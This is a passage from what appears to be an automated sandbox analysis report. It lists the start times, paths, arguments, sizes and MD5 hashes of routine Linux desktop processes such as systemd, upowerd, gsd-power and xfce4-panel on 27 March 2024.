              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:49
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-power
              Arguments:/usr/libexec/gsd-power
              File size:88672 bytes
              MD5 hash:28b8e1b43c3e7f1db6741ea1ecd978b7

              Chronological Activities


              General

              Start time (UTC):10:01:49
              Start date (UTC):27/03/2024
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Chronological Activities


              General

              Start time (UTC):10:01:49
              Start date (UTC):27/03/2024
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Chronological Activities


              General

              Start time (UTC):10:01:50
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:01:50
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities


              General

              Start time (UTC):10:01:51
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:01:51
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities


              General

              Start time (UTC):10:01:55
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:01:55
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities


              General

              Start time (UTC):10:02:01
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:02:01
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities


              General

              Start time (UTC):10:02:06
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:02:06
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities


              General

              Start time (UTC):10:02:07
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:02:07
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities


              General

              Start time (UTC):10:02:07
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:02:07
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities


              General

              Start time (UTC):10:02:09
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:02:09
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities